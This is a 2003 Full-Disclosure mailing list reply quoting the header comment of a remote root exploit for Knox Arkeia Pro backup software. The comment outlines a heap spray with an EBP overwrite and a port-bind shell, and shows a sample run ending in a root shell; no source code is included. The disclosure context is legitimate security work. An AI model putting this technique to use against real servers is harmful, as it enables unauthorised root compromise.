Have you tested this on other versions? DH
On Friday 19 September 2003 10:36, A. C. wrote: > Exploit attached for Knox Arkeia Pro v5.1.21 backup > software from http://www.arkeia.com. > > > > > /* > * Knox Arkiea arkiead local/remote root exploit. > * > * Portbind 5074 shellcode > * > * Tested on Redhat 8.0, Redhat 7.2, but all versions > are presumed vulnerable. > * > * NULLs out least significant byte of EBP to pull EIP > out of overflow buffer. > * A previous request forces a large allocation of > NOP's + shellcode in heap > * memory. Find additional targets by searching the > heap for NOP's after a > * crash. safeaddr must point to any area of memory > that is read/writable > * and won't mess with program/shellcode flow. > * > * ./ark_sink host targetnum > * [EMAIL PROTECTED] dir]$ ./ark_sink 192.168.1.2 1 > * [*] Connected to 192.168.1.2:617 > * [*] Connected to 192.168.1.2:617 > * [*] Sending nops+shellcode > * [*] Done, sleeping > * [*] Sending overflow > * [*] Done > * [*] Sleeping and connecting remote shell > * [*] Connected to 192.168.1.2:5074 > * [*] Success, enjoy > * id > * uid=0(root) gid=0(root) > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) > * > * > */ > > > > > __________________________________ > Do you Yahoo!? > Yahoo! SiteBuilder - Free, easy-to-use web site design software > http://sitebuilder.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
